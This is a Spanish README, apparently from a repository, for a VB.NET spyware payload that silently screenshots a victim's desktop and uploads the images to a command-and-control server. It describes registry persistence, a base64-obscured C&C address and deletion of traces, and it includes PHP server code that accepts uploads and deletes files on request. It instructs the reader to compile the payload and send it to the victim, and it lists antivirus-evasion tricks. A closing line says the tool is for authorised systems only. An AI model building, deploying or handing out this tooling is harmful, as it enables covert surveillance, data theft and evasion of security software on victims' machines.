Mr.Peter

Captura de pantalla silenciosa | Carga útil posterior a la explotación | VB.NET

Una carga útil simple para tomar una captura de pantalla del escritorio de la víctima y subirla al C&C.

• Persistente (usando la clave de ejecución del registro)
• Funciona en segundo plano
• Menos código, menos errores y menos detección;)
• Elimina la captura de pantalla del disco después de cargarla en C&C
• Servidor C&C en base64
• Sube capturas de pantalla de forma organizada en C&C
• ¡No se necesita reenvío de puertos! funciona con un solo archivo php
• [TODO] Información de la máquina
• [TODO] Cifrado
• [TODO] Establecer intervalo de forma remota desde C&C

• Clona este repositorio.
• Un alojamiento web que recomiendo namecheap
• Vaya a su carpeta public_html, cree un nuevo archivo PHP y coloque el siguiente código en él.

 <?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>

• Abra el proyecto en Visual Studio y edite la siguiente variable en el código fuente

 Dim server As String = BaseDecode1("your server address here in base64 encoded") 

• y edite esta variable a continuación también

 Dim php As String = "yourphpfilename.php?" & "folder="

• ¡Simplemente compílelo y envíelo a la víctima, eso es todo!

Para evitar la detección de antivirus

• Cambiar el ícono de la aplicación
• Generar nuevo GUID
• Cambia todas las variables.
• Ofuscar el código usando Obfuscar
• Cambiar la información de la Asamblea

Si esta herramienta te ha resultado útil, no dudes en agradecerme invitándome un café :)

Se supone que esta herramienta debe usarse únicamente en sistemas autorizados. Cualquier uso no autorizado de esta herramienta sin permiso explícito es ilegal.

LICENCIA PÚBLICA GENERAL GNU